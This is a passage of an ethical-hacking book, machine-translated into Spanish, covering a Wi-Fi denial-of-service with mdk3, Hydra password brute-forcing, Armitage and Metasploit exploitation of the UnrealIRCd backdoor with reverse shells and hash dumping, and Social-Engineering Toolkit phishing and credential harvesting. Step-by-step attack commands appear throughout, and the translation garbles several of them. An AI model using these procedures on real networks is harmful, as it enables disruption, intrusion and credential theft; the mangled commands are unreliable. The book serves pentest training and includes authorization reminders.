interrumpen e interfieren con cualquier otra señal que esté transmitiendo al mismo tiempo.

Bueno, en este capítulo, voy a compartir con ustedes cómo realizar un ataque DOS. La
denegación de servicio o DOS significa que vamos a sacar a todos de una red y negarles el
servicio.

Primero, necesitamos conectar nuestro adaptador de red inalámbrica. Una vez que haya
hecho eso, debe abrir una terminal y luego escribir;
Machine Translated by Google

"ifconfig"

presione enter y ahora necesita abrir un archivo de texto porque necesita tomar nota de cierta
información. Primero, vamos a tomar nota de nuestra interfaz inalámbrica, que para mí es wlan0.

Continúe y tome nota de ese nombre. Una vez que haya hecho eso, puede borrar su terminal
escribiendo
"claro"

luego presione Entrar. A continuación, necesitamos escanear los puntos de acceso disponibles para poder encontrar un
objetivo, así que escriba;

"escanear iwlist wlan0"

luego presione Entrar. Esto mostrará una lista de todos los puntos de acceso disponibles, así que
continúe y busque un objetivo. Una vez que haya encontrado su objetivo, debe tomar nota del e
SSID y luego debe tomar nota del BSSID, y luego debe tomar nota del número de canal.

Una vez que haya hecho eso, necesitamos crear un archivo de lista negra, así

que escriba; “echo (BSSID del punto de acceso de destino) > lista negra” y luego

presione Enter. Esto creará un archivo llamado "lista negra", que contiene los puntos de acceso de
destino BSSID. Ahora necesitamos poner nuestra interfaz inalámbrica en modo monitor. Para hacer
ese tipo; “airmon-ng start wlan0” y luego presione Enter. Este comando creará una interfaz de

monitor llamada "mon0". Continúe y tome nota de esa interfaz de monitor. Para confirmar que se

llama a su interfaz de monitoreo, puede escribir;

“Airmon-ng”

Y luego presione ENTRAR. Esto mostrará todas sus interfaces, y debería ver allí la nueva interfaz
de monitoreo llamada "mon0". Ahora estamos listos para realizar nuestro ataque DOS, así que
sigamos adelante y escribamos;
"mdk3"

luego presione enter. A continuación, vamos a escribir;


“mdk3 mon0 d –b lista negra –c 6”
Machine Translated by Google

Aquí, debe escribir el nombre de la interfaz del monitor, que es mon0, luego el nombre
de nuestro archivo de lista negra, que en mi caso se llama "lista negra", y luego el canal
de nuestro punto de acceso de destino, que en mi caso es "6".

Una vez que haya hecho eso, continúe y presione ENTER. A continuación, verá que
comenzará a enviar paquetes y comenzará a inundar la red.

Mientras tanto, si busca otras máquinas conectadas a la misma red, notará que estarán
desconectadas. Ahora tenemos que seguir adelante y abrir otra terminal, y vamos a
escribir;

“mdk3 mon0 a –m –i (puntos de acceso de destino BSSID)”

y presione Entrar. Al mirar otra computadora cercana, debería ver que acaba de ser
expulsada de la red. Si observa su Wi-Fi, debería ver que se ha desconectado.

Puede continuar e intentar conectarse al BSSID objetivo, pero le dará un mensaje de


tiempo de espera de conexión. Eso es todo. Como ve, los ataques de DOS son
relativamente simples. Debería ver que ha sido desconectado y ahora ya no podemos
conectarnos y así es como puede realizar un ataque de DOS usando MDK3.
Machine Translated by Google

Capítulo 30 Ataque de fuerza bruta con TCP Hydra

En este capítulo, aprenderá a analizar un ataque de fuerza bruta contra el sistema de


destino. En este escenario imagina que tienes 3 nodos. El atacante usará Kali Linux con la
dirección IP 10.0.0.111 y la máquina de la víctima usará un dispositivo con Windows 10 con
la dirección IP 10.0.0.202.

Por último, el probador de penetración utilizará Kali Linux para interceptar todo el tráfico y
analizar cualquier ataque a la red. Imagine que usted es el atacante y desea atacar uno de
los hosts de la red que tiene un servicio Telnet activado.

Lo primero que va a hacer un hacker es tratar de usar la fuerza bruta en la víctima objetivo.
Para comenzar con un ataque de fuerza bruta, hay varias herramientas que puede usar,
pero hay una que es muy popular entre los pen testers y que aún no hemos cubierto se
llama "hidra".

Para usar hydra, primero debe abrir la ventana de su terminal Klai Linux y escribir el
comando: “hydra –V –l (ruta del archivo de contraseña del diccionario) –t 50 –(dirección IP

de la víctima) ssh”

Luego presiona enter. Aquí, la opción "-V" es para verbosidad máxima, luego "-l" es para el
nombre de inicio de sesión, seguido de la ruta del archivo de contraseña del diccionario, y
el argumento "-t" selecciona el número de conexiones paralelas.

Cuanto mayor sea el número, más rápido se realizará la prueba, seguida de la dirección IP
de la víctima y, por último, el protocolo que quiero forzar. Una vez que haya presionado
Enter, el ataque comenzará, y todo lo que tiene que hacer ahora es esperar a que se
descifre la contraseña.

La contraseña debe ser descifrada en pocos minutos. Desde la perspectiva de un hacker,


¿cuál es el siguiente paso? Bueno, el hacker intentará iniciar sesión usando Telnet.

Primero, el pirata informático emitiría el comando Telnet, luego especificaría la dirección IP


del host de la víctima e ingresaría el nombre de inicio de sesión seguido de la contraseña
descifrada.

En este momento, el hacker está feliz por esta victoria. Si salta a la máquina de prueba de
penetración y analiza este truco, debería ver qué sucede cuando el atacante intenta una
combinación de nombre de usuario y contraseñas que no están autorizadas.
Machine Translated by Google

Para analizar este tipo de conversaciones en Wireshark, haga clic derecho en cualquier
paquete y seleccione "Seguir transmisión TCP". El mensaje dirá que no se permiten
más conexiones al servidor telnet. "Por favor, inténtelo de nuevo más tarde".

Este es el típico mensaje que el atacante está recibiendo una y otra vez cuando falla
durante el ataque de fuerza bruta.

Dentro de Wireshark, cuando observa el tráfico intervenido, debe desplazarse hacia


abajo hasta que ya no vea este tipo de patrón, y si sigue la secuencia nuevamente,
debería ver el nombre de usuario y la contraseña en texto sin formato, y también debería
ver el comando que el atacante ejecutó.

La lista que ve en esta página es Clear Text Protocols como HTTP, FTP y protocolos
de correo electrónico como POP, IMAP, SMTP, Telnet o Voice over IP.

Si descubre que su cliente está utilizando uno de estos protocolos, debe mencionarlo
en su informe final. Una solución simple es reemplazar estos protocolos de texto claro
con otros protocolos seguros como HTTPS en lugar de HTTP, SFTP o SCP en lugar de
FTP, etc.
Machine Translated by Google

Capítulo 31 Armitage Ave María

Armitage es una excelente interfaz gráfica de usuario para el marco Metasploit.


Armitage se desarrolló con el objetivo de ayudar a los profesionales de la seguridad a comprender
mejor a los piratas informáticos y cómo implementan diversos ataques.

Para obtener más información sobre este excelente proyecto, consulte el sitio web oficial de
Armitage en fastandeasyhacking.com. ¿Cómo usar Armitage?

Bueno, Armitage también está incluido en Kali Linux, por lo tanto, todo lo que tiene que hacer es
encenderlo y escribir dentro de su interfaz de línea de comandos: "armitage"

Luego presiona enter. Simplemente puede aceptar las opciones predeterminadas para la
ventana que aparece la primera vez y hacer clic en el botón Conectar, luego haga clic en Sí
para iniciar el servidor Metasploit RPC.

La interfaz de usuario de Armitage tiene tres paneles principales llamados Módulos, Objetivos y
Pestañas. Puede hacer clic en el área entre esos paneles para cambiar su tamaño si lo desea,
pero veamos cada uno de estos paneles.

El panel del navegador de módulos le permite iniciar un módulo auxiliar de Metasploit, un exploit
o generar una carga útil y ejecutar un módulo posterior a la explotación.

El panel de objetivos muestra sus objetivos. Armitage representa cada objetivo como una
computadora con su dirección IP estática o asignada y otra información al respecto debajo del
ícono de la computadora.

Una vez que ejecute la herramienta Armitage, ya debería identificar un host si tiene otros
sistemas ejecutándose en su sesión. Si tiene muchos hosts, será difícil trabajar con la vista de
gráfico.

Si esto sucede, para esta situación, Armitage tiene una vista de tabla en su lugar.
Por lo tanto, vaya al elemento del menú Armitage, luego seleccione "Establecer vista de destino"
y luego seleccione la opción "Vista de tabla". Abajo, tienes la zona de pestañas.

Armitage abre cada consola de diálogo y tabla en una pestaña debajo del módulo y los paneles
de destino. La consola de Metasploit o la consola de Meterpreter y las interfaces de shell usan
cada una una pestaña de consola.

Una pestaña de la consola le permite interactuar con esas interfaces a través de Armitage.
Si desea abrir una nueva consola, debe ir al menú Ver y seleccionar Consola.
Machine Translated by Google

Los registros de Armitage son todos shell de la consola y el registro de eventos le dará una
salida para usted. Organiza esos registros por fecha y nodos. Encontrará estos registros en la
carpeta Armitage.

Vaya a Ver, luego Informes, seleccione luego "Registros de actividad" para abrir la carpeta.
Imagina que quieres exportar todo el tráfico que has hecho en esta aplicación.

Armitage y Metasploit comparten una base de datos para rastrear sus hosts, servicios,
vulnerabilidades, credenciales y cadenas de agentes de usuario, capturadas por los módulos
de explotación del navegador.

Para obtener toda esta información, vaya a Ver, Informes y luego haga clic en Exportar datos.
Esta opción exportará los datos de Metasploit y creará archivos de valores separados por
tabuladores XML fácilmente analizables.

Cuando se trata de espacios de trabajo, la función Armitage Dynamic Workspaces le permite


crear vistas en la base de datos del host y cambiar rápidamente entre ellas.

Para comprender mejor de lo que estoy hablando, seleccione el menú Espacios de trabajo y
luego haga clic en Administrar. Para administrar sus espacios de trabajo dinámicos, puede
agregar, editar y eliminar espacios de trabajo que ya creó.

Para iniciar un ataque, Armitage agrupa varios escaneos Metasploit en una función llamada
Escaneos MSF. Esta característica buscará un puñado de puertos abiertos.

De manera similar a nmap, luego enumera varios servicios comunes utilizando módulos
auxiliares de Metasploit que están integrados para este propósito. Para su ejemplo, puede
estar atacando una máquina con Windows XP.

Puede seleccionarlo, hacer clic derecho y luego hacer clic en Escanear. También puede ir al
menú Hosts y hacer clic en MSF Scans, ya que ambos le brindarán la misma funcionalidad.

Una vez que se completa el escaneo, antes de ir y comenzar a atacar, debes elegir tu arma.
Armitage hace que este proceso sea muy fácil. Seleccione el menú "Ataques" y haga clic en
Buscar ataques.

La opción "Buscar ataques" generará un menú de ataque personalizado para cada host.
Para explotar un host, haga clic con el botón derecho en él y navegue hasta Atacar, y elija un
"Explotar" de la lista.

El cuadro de diálogo "Explotar" le permite configurar opciones para un módulo y elegir si usar
una carga útil de conexión inversa o no. Para hazañas remotas,
Machine Translated by Google

Armitage elige su carga útil por usted.

En general, Armitage utilizará Meterpreter para objetivos de Windows y una carga útil de
shell de comandos para objetivos de UNIX. Después de esto, todo lo que tiene que hacer
es hacer clic en el botón "Iniciar".

Si el exploit tiene éxito, Armitage hará que el anfitrión se vuelva rojo y lo rodeará con bolas
de rayos espeluznantes. Si falla la explotación manual, no se preocupe. Tienes la opción
de “Ave María”.

Vaya al menú "Ataques" y haga clic en "Ave María" para iniciar esta función.
La función Hail Mary de Armitage encontrará exploits relevantes para su objetivo, luego
filtrará los exploits utilizando información conocida y luego los clasificará en un orden
óptimo.

Esta función no encontrará todos los shells posibles, pero es una buena opción si no sabe
qué más probar. Armitage facilita la administración del agente Meterpreter una vez que
explota con éxito un host.

A continuación, puede hacer clic derecho en el "host" para acceder al menú de Meterpreter,
luego seleccionar "Meterpreter" y elegir lo que quiera de la lista.

Por ejemplo, puede seleccionar "buscar archivos de la lista". No se sorprenda si encuentra


elementos de directorio en la máquina de la víctima. Armitage es excelente y muy fácil de
usar, pero le recomiendo que practique con él y vea qué método de ataque es más exitoso
para sus requisitos.

Por último, le pediré nuevamente que se asegure de que tiene una autorización por escrito
para usar Armitage en un entorno de producción o en vivo. Si solo está practicando en el
laboratorio de su casa, en un entorno que no sea de producción, eso no debería causar
ningún problema a nadie; aún así, te sugiero que apagues tu enrutador y practiques con
cuidado sin ninguna conexión a Internet.

Capítulo 32 El Marco Metasploit

La explotación es el corazón de la piratería ética. Al explotar las vulnerabilidades, puede


comenzar a hacer suposiciones sobre lo peligroso que puede ser.

Metasploit Framework, o MSF, es una herramienta de código abierto diseñada para facilitar
las pruebas de penetración. La aplicación está escrita en el lenguaje de programación
Ruby.
Machine Translated by Google

Utiliza un enfoque modular, lo que facilita las hazañas. Esto facilita el desarrollo y la codificación de
exploits, y también permite implementar fácilmente ataques complejos.

El módulo de explotación son los fragmentos de código que apuntan a vulnerabilidades específicas.
Los exploits activos explotarán un objetivo específico y se ejecutarán hasta que se completen, y luego
saldrán.

Por otro lado, los exploits pasivos esperan hosts entrantes, como navegadores web o clientes FTP, y los
explotan cuando se conectan a la red.

Las cargas útiles son el código malicioso que implementa comandos inmediatamente después de una
explotación exitosa. Los módulos auxiliares no establecen ni admiten directamente el acceso entre el
pen tester y el sistema de destino.

En su lugar, realizan funciones relacionadas, como escaneo, fuzzing o sniffing, que respaldan la fase de
explotación. Después de un ataque exitoso, los módulos de publicación se ejecutan en objetivos
comprometidos para recopilar datos útiles y hacer que el atacante penetre más profundamente en la red
objetivo.

Los codificadores se utilizan para eludir las defensas antivirus y estos módulos codifican la carga útil
para que no se pueda detectar mediante técnicas de coincidencia de firmas.

Por último, los módulos sin operaciones se utilizan para facilitar los desbordamientos de búfer durante
los ataques. Los pasos para explotar un sistema de destino mediante MSF comienzan primero con la
elección y configuración de un exploit.

A continuación, debe verificar el sistema de destino para determinar si es susceptible de ser atacado por
el exploit. Este paso es opcional y debe ser su método para minimizar la detección.

Después de eso, puede elegir y configurar la carga útil, que es el código que se ejecutará en el sistema
de destino luego de una explotación exitosa. Un ejemplo de una carga útil sería algo así como un reverso
del sistema comprometido al host pentester.

Después de este paso, también puede elegir una técnica de codificación para eludir los controles de
detección, como un sistema de detección de intrusos o un software antivirus.
Por último, tienes que ejecutar el exploit.

Déjame explicarte cómo se hace. Como pen tester, debe investigar todas las vulnerabilidades. Por
ejemplo, en el puerto 6667 Metasploitable ejecuta la aplicación llamada “unrealircd”, que es un demonio
IRC.
Machine Translated by Google

Esta versión contiene una puerta trasera que quizás no note durante meses, activada al
enviar las letras A, B, seguidas de un comando del sistema al servidor en cualquier puerto
de escucha.

Metasploit tiene un módulo para explotar esto con el fin de obtener un interactivo. Para
iniciar el truco, primero abre la consola. En Kali, deberá iniciar el servidor "PostgreSQL"
antes de iniciar el marco.

A continuación, debe ejecutar la aplicación "msfconsole". Como cualquier aplicación de


consola, ingrese cómo o un signo de interrogación una vez en el símbolo del sistema, de
modo que se muestren y enumeren todos los comandos disponibles junto con una
descripción de para qué se utilizan.

Puede comenzar a organizar su proyecto utilizando lo que se denomina espacios de trabajo.


Puede crear un nuevo espacio de trabajo para su laboratorio y, por cierto, el argumento "-a"
se usa para agregar un espacio de trabajo.

A continuación, para asegurarse de que se seleccione un nuevo espacio de trabajo,

ejecute el comando "espacio de trabajo" en todos los espacios de trabajo que están

almacenados en la base de datos de Metasploit. A continuación, busque su exploit utilizando el

"búsqueda"

mando. El exploit devuelto para el servicio IRCD puede aparecer en la lista y asigna la
clasificación relativa de qué tan exitoso es en lograr un exploit.

Puede copiar el nombre del exploit para usarlo en los siguientes comandos. Se puede
obtener información adicional sobre este exploit utilizando el
"información"

mando. La información devuelta debe incluir referencias, así como información sobre este
exploit. Es mejor comprobarlo antes de continuar y perder el tiempo.

Para indicar a Metasploit que atacará al objetivo con un exploit, emita el

"utilizar"

mando. Después del comando "usar", Metasploit cambia el símbolo del sistema de "msf" a
"msf exploit (unreal_ircd_3281_backdoor)".
Machine Translated by Google

Si necesita configurar alguna opción para el exploit, puede hacerlo ejecutando "mostrar
opciones"

mando. Por ejemplo, si necesita configurar el campo requerido para el host remoto, que es
la dirección IP del sistema que está siendo atacado, para cambiar el valor de cualquier
opción, comience por el
"colocar"

palabra clave, seguida del nombre de la opción y, finalmente, ingresa el valor de la opción.

Para ejecutar la carga útil, escriba

el comando "mostrar carga útil"

para enumerar todas las cargas útiles adecuadas para este exploit. Hay un montón de ellos,
pero puede seleccionar la "carga útil de shell inversa" para este ejemplo. ¿Por qué harías

eso? Bueno, esto se debe a que es una carga útil popular para los shells de UNIX. Cuando

digo popular, significa que la gente lo usó antes con una buena tasa de éxito.

A continuación, debe verificar las opciones para la carga útil seleccionada. La opción Carga
útil le pedirá que ingrese un valor para la dirección IP del host local. Puedes comprobarlo
con el comando

“si configuración”.

Ingrese el valor y presione Entrar. Para iniciar el ataque, ingrese el

comando "explotar" y presione Entrar. Metasploit inicia el ataque y lo

confirmará indicando que se abrió la sesión 1 de Command Shell y brindando las direcciones
IP que originan y terminan el shell inverso.

Cuando un sistema está comprometido hasta este punto, está listo para las actividades
posteriores a la explotación. La explotación posterior es una parte del flujo de trabajo en la
que el atacante obtiene el valor total del ataque.

Una vez que un sistema ha sido comprometido, el atacante generalmente realiza las
siguientes actividades. Él o ella realiza una evaluación rápida para caracterizar el entorno
local, como infraestructura, conectividad, cuentas, presencia de
Machine Translated by Google

archivos de destino o aplicaciones que pueden facilitar más ataques.

También localiza y copia o modifica archivos de interés de destino, como archivos de


datos o información financiera. Además, crea cuentas adicionales y modifica el sistema
para apoyar las actividades posteriores a la explotación.

Además, intenta escalar verticalmente el nivel de privilegios mediante la captura de


credenciales de nivel de sistema o administrador, e intenta atacar otros sistemas de datos
que se denominan escalamiento horizontal.

Al hacer pivotar el ataque a través del sistema comprometido hacia el resto de la red,
instala puertas traseras persistentes y canales encubiertos para mantener el control y
tener comunicaciones seguras con el sistema comprometido.

Por último, el atacante puede eliminar las indicaciones del ataque del sistema
comprometido. Para tener éxito, las actividades posteriores a la explotación requieren un
conocimiento completo del sistema operativo del objetivo para garantizar que se puedan
eludir los controles de protección.

Ya aprendió cómo explotar el sistema anteriormente, por lo que pondrá la sesión en


segundo plano presionando "Ctrl + Z" y escriba "y" para confirmar.

Es fundamental conocer el ID de sesión del módulo de post-explotación que se va a


utilizar. Esto se puede obtener con el comando "sesiones".

Si ha utilizado esta herramienta por primera vez, su sesión es 1. Uno de los primeros
módulos que puede probar se llama "hashdump", que intentará recopilar los hash de
contraseñas del sistema.

La única configuración que debe insertar aquí es el ID de la sesión. Antes de continuar,


debe configurar el ID de sesión en la sección de opciones.

Otro módulo post-explotación muy interesante de Metasploit es el “enum_configs”, que


obtendrá todos los archivos de configuración importantes, y los almacenará en tu sistema.

Debería ver en el resultado una muestra de los archivos de configuración que se han
obtenido del sistema remoto.

Si desea verificar uno de esos archivos txt usando una aplicación de edición de texto,
copie uno de ellos, abra una nueva consola y use la herramienta llamada "aplicación
nano" para ver su contenido.
Machine Translated by Google

Una vez que esté listo para continuar, cierre esta ventana y regrese a su ventana principal.
Esta vez deberá enumerar las configuraciones de red con el módulo "enum_network".

El comando “enum_network” guarda todo lo que ha encontrado en archivos de texto, por lo


que puede consultarlos para descubrir qué tipo de instalaciones existen en el sistema remoto,
como IDS, antivirus, IPS o firewalls.

A continuación, puede usar el módulo "enum_protections", pero también puede enumerar todo
el sistema obteniendo información sobre las cuentas de usuario, los paquetes instalados, los
servicios, el disco duro, la versión de Linux, etc.

Para obtener toda esta información, puede utilizar el

“sistema_enum”

y puede consultar el contenido de los archivos de texto generados. Para descubrir información
del historial del usuario, también hay un módulo de Metasploit que almacena esta información
en su sistema local que se llama "enum_users_history".
Machine Translated by Google

Capítulo 33 Caja de herramientas de ingeniería social

La ingeniería social es una técnica importante que debe tener en cuenta y, en breve, comprenderá
cómo los piratas informáticos utilizan aplicaciones de ingeniería social para engañar a las víctimas
para que ejecuten la trampa vulnerable.

SET o Social-Engineering Toolkit es un marco de código abierto impulsado por Python que está
diseñado específicamente para facilitar los ataques de ingeniería social.

Una ventaja significativa de Social-Engineering Toolkit es su interconectividad con el marco


Metasploit que proporciona las cargas útiles necesarias para la explotación, el cifrado para eludir el
antivirus y el módulo de escucha que se conecta al sistema comprometido cuando envía un shell al
atacante. .

Para iniciar el kit de herramientas de ingeniería social, escriba el comando

"kit de herramientas"

y presione Entrar. Tiene varias opciones para seleccionar cuando se carga esta aplicación. El primero
son los ataques de ingeniería social, que ofrece una combinación de métodos de ingeniería social.

El segundo es Fast-Track Penetration Testing, que brinda acceso rápido a algunas herramientas
especializadas. Puede escribir el número 2 para seleccionar esta opción.

A continuación, se le presentarán más opciones. La primera herramienta es un descifrado de


contraseñas de bases de datos SQL, la segunda son algunos exploits personalizados que se basan
en Python.

Después de eso, tenemos la Enumeración de Usuario, y finalmente contiene la Inyección PSEXEC


Powershell. Puede escribir el número 99 para volver al menú principal, pero si selecciona la primera
opción que contiene herramientas para ataques de ingeniería social, todo lo que tiene que hacer es
presionar el número 1 en su teclado.

Una vez que haya seleccionado esta opción, una vez más tendrá más opciones.
El primero de la lista son los vectores de ataque Spear-Phishing, que permiten a un atacante crear
mensajes de correo electrónico y enviarlos a las víctimas específicas con exploits adjuntos.

A continuación, tenemos los vectores de ataque del sitio web que utilizan múltiples ataques basados
en la web. Si selecciona eso para ver los detalles, simplemente presione el número 2 en su teclado.
Machine Translated by Google

Una vez que haya seleccionado esta opción, se le presentarán más opciones una vez más. El
primero en la lista llamado Java Applet Attack Method que falsifica un certificado Java y entrega
una carga útil basada en Metasploit.

Este es conocido como uno de los ataques más exitosos, y es efectivo contra todos los sistemas
como objetivos Windows, Linux u OSX. El siguiente en la lista se llama Metasploit Browser
Exploit Method que ofrece una carga útil de Metasploit mediante un ataque I-frame.

A continuación en la lista tenemos lo que se llama el método de ataque Credential Harvester


que clona un sitio web y reescribe automáticamente los parámetros posteriores para permitir
que un atacante intercepte y recolecte las credenciales de los usuarios.

A continuación en nuestra lista, tenemos lo que se llama el método de ataque Tabnabbing, que
reemplaza la información en una pestaña inactiva del navegador con una página clonada que
se vincula con el atacante.

Después de eso, tenemos el método de ataque Web Jacking que utiliza reemplazos de marcos
I para hacer que el enlace URL resaltado parezca legítimo. Por último en la lista tenemos el
método web Multi-Ataque que permite a un atacante seleccionar algunos o varios, o todos los
ataques que se pueden lanzar a la vez.

Si regresa a la pantalla anterior y verifica el resto de los ataques enumerados, el generador de


medios infecciosos, por ejemplo, crea un archivo de ejecución automática y una carga útil de
Metasploit.

Una vez que se haya copiado en un dispositivo USB e insertado en el sistema de destino, se
activará, se ejecutará automáticamente y comprometerá el sistema. A continuación, creará un
módulo Payload and Listener, que es un método rápido basado en menús, creando una carga
útil de Metasploit.

Después de eso, tenemos lo que se llama Mass Mailer Attack, que permite al atacante enviar
múltiples correos electrónicos personalizados a una sola dirección de correo electrónico o una
lista de varias direcciones.

A continuación, tenemos el vector de ataque basado en Arduino que programa dispositivos


basados en Arduino. Debido a que estos dispositivos se registran como un teclado USB cuando
se conectan a un sistema Windows físico, pueden eludir la seguridad al deshabilitar la ejecución
automática u otra seguridad de punto final.

El vector de ataque del punto de acceso inalámbrico, por ejemplo, creará un punto de acceso
inalámbrico falso y un servidor DHCP en el sistema del atacante y redirigirá
Machine Translated by Google

todas las consultas de DNS al atacante.

El hacker puede entonces lanzar varios ataques, como el Java Applet Attack o el Credential
Harvester Attack. El QRCode Generator Attack Vector, por ejemplo, crea un código QR con una
URL definida asociada con un ataque.
Los vectores de ataque de Powershell permitirán al atacante crear ataques que se basen en
Powershell, un shell de línea de comandos y un lenguaje de secuencias de comandos disponible
en todos los sistemas, como Windows, Vista y versiones superiores.

Por último, tenemos módulos de terceros que permiten al atacante usar la herramienta de
administración remota como parte de un ataque de subprograma de Java o como una carga útil aislada.

Esta herramienta es una herramienta de acceso remoto basada en menús y texto. Cubrir todos
estos métodos tomaría otro libro por sí solo, pero como puede ver, SET es muy fácil de usar y casi
cualquiera puede usarlo porque todo lo que tiene que hacer es decidir qué ataque desea
implementar, luego presione su número asociado en su teclado. .

Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para usar
SET en un entorno de producción o en vivo. Si solo está practicando en el laboratorio de su casa,
en un entorno que no sea de producción, eso no debería causar ningún problema a nadie; aún así,
te sugiero que apagues tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Conclusión

Espero que este libro haya podido ayudarlo a comenzar su búsqueda de convertirse en
un hacker ético o un probador de penetración. Si descubrió que algunas de las técnicas
y estrategias están siendo avanzadas, no se preocupe, porque la práctica continua lo
ayudará a convertirse en un mejor profesional de TI en poco tiempo.

Gracias de nuevo por comprar este libro.

Por último, si disfrutó del contenido, tómese un tiempo para compartir sus pensamientos
y publicar una reseña. ¡Sería muy apreciado!
Machine Translated by Google

Sobre el Autor

Hugo, originario de Austria, actualmente vive en Manchester, Reino Unido. Hugo es un


especialista en seguridad de TI, con más de 17 años de experiencia en el campo de TI.

Comenzó a trabajar en Service Desk y luego pasó al campo de las redes, donde
participó en varios proyectos que incluyen implementaciones inalámbricas, diseño de
seguridad inalámbrica, seguridad de redes cableadas y seguridad de cortafuegos.

En 2015, debido al aumento de los ataques cibernéticos, el Departamento de Seguridad


se expandió y comenzó a reclutar miembros adicionales para el equipo. Fue entonces
cuando Hugo una vez más hizo un cambio y comenzó a trabajar como analista de
seguridad de TI.

Desde 2017, Hugo se convirtió en Especialista en Seguridad y comenzó a brindar


servicios profesionales y consultar a varias Empresas para mejorar su seguridad.

También podría gustarte